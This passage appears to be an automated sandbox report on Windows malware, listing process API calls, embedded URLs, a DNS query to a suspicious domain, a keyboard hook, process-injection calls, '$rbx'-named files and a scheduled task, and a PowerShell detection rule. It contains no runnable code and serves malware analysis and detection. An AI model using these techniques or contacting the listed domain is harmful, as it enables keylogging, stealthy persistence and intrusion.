Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.Management.Infrastructure.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Management.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.pdbiy source: WER3551.tmp.dmp.28.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Transactions.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000031.00000002.2996208250.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518101582.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000031.00000002.2998816420.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518332249.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000031.00000002.3001537323.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000031.00000000.2518437173.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Transactions.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Numerics.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.ni.pdb source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER3551.tmp.dmp.28.dr, WER604E.tmp.dmp.10.dr
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D894 FindFirstFileExW,19_2_000002241390D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000002241390DA18
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D894 FindFirstFileExW,19_2_000002241393D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,19_2_000002241393DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_000002BCD7E3DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_2_000002BCD7E3D894 FindFirstFileExW,20_2_000002BCD7E3D894
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,37_2_0000026504EADA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_0000026504EAD894 FindFirstFileExW,37_2_0000026504EAD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACD894 FindFirstFileExW,38_2_0000025DC1ACD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1ACDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000025DC1ACDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CED894 FindFirstFileExW,38_2_0000025DC1CED894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000025DC1CEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_0000025DC1CEDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000225DC64DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC64D894 FindFirstFileExW,39_2_00000225DC64D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,39_2_00000225DC67DA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC67D894 FindFirstFileExW,39_2_00000225DC67D894
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AEDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,40_2_00000202C0AEDA18
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AED894 FindFirstFileExW,40_2_00000202C0AED894
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,41_2_000002A66130DA18
Source: C:\Windows\System32\svchost.exeCode function: 41_2_000002A66130D894 FindFirstFileExW,41_2_000002A66130D894
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000002BAAEDCDA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEDCD894 FindFirstFileExW,42_2_000002BAAEDCD894
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_000002BAAEE4DA18
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE4D894 FindFirstFileExW,42_2_000002BAAEE4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CD894 FindFirstFileExW,43_2_0000026A879CD894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A879CDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_0000026A879CDA18
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4D894 FindFirstFileExW,43_2_0000026A87F4D894
Source: C:\Windows\System32\svchost.exeCode function: 43_2_0000026A87F4DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,43_2_0000026A87F4DA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537ADA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_00000179537ADA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537AD894 FindFirstFileExW,44_2_00000179537AD894
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DDA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,44_2_00000179537DDA18
Source: C:\Windows\System32\svchost.exeCode function: 44_2_00000179537DD894 FindFirstFileExW,44_2_00000179537DD894
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,45_2_0000016CE653DA18
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE653D894 FindFirstFileExW,45_2_0000016CE653D894
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56DA18 FindFirstFileExW,FindNextFileW,FindClose,FindClose,46_2_000002295D56DA18
Source: C:\Windows\System32\svchost.exeCode function: 46_2_000002295D56D894 FindFirstFileExW,46_2_000002295D56D894
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: azure-winsecure.com
Source: Microsoft-Windows-LiveId%4Operational.evtx.50.drString found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 00000028.00000002.3019367929.00000202C0200000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 00000028.00000002.3011588916.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454927600.00000202BFC89000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2455463583.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3019367929.00000202C0249000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: Amcache.hve.10.drString found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 00000028.00000002.3033356761.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456042778.00000202C0379000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C039A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3035896266.00000202C03AA000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2456100442.00000202C0390000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co9=
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.drString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6xGx
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: Microsoft-Windows-PushNotification-Platform%4Operational.evtx.50.drString found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindows user hook set: 0 keyboard low level C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 1284, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 4828, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0FF4 NtResumeThread,36_2_00007FFD9B8C0FF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0F30 NtSetContextThread,36_2_00007FFD9B8C0F30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0C6D NtWriteVirtualMemory,36_2_00007FFD9B8C0C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8BE0B8 NtUnmapViewOfSection,36_2_00007FFD9B8BE0B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8C0A4E NtUnmapViewOfSection,36_2_00007FFD9B8C0A4E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9B8BE088 NtUnmapViewOfSection,36_2_00007FFD9B8BE088
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001868 OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle,38_2_0000000140001868
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_00000225DC642C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,39_2_00000225DC642C80
Source: C:\Windows\System32\lsass.exeCode function: 40_2_00000202C0AE2300 NtQuerySystemInformation,StrCmpNIW,40_2_00000202C0AE2300
Source: C:\Windows\System32\dwm.exeCode function: 42_2_000002BAAEE42C80 TlsGetValue,TlsGetValue,TlsGetValue,NtEnumerateValueKey,NtEnumerateValueKey,NtEnumerateValueKey,TlsSetValue,TlsSetValue,TlsSetValue,42_2_000002BAAEE42C80
Source: C:\Windows\System32\wbem\WMIADAP.exeCode function: 45_2_0000016CE6532300 NtQuerySystemInformation,StrCmpNIW,45_2_0000016CE6532300
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\20241004
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\system32\20241004\PowerShell_transcript.128757.tvTEgCNQ.20241004034311.txt
Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-QgS1M4PT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_4bxtuddq.5xi.ps1
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138DCC9419_3_00000224138DCC94
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138D23F019_3_00000224138D23F0
Source: C:\Windows\System32\cmd.exeCode function: 19_3_00000224138DCE1819_3_00000224138DCE18
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390D89419_2_000002241390D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413902FF019_2_0000022413902FF0
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241390DA1819_2_000002241390DA18
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393D89419_2_000002241393D894
Source: C:\Windows\System32\cmd.exeCode function: 19_2_0000022413932FF019_2_0000022413932FF0
Source: C:\Windows\System32\cmd.exeCode function: 19_2_000002241393DA1819_2_000002241393DA18
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E0CE1820_3_000002BCD7E0CE18
Source: C:\Windows\System32\conhost.exeCode function: 20_3_000002BCD7E0CC9420_3_000002BCD7E0CC94
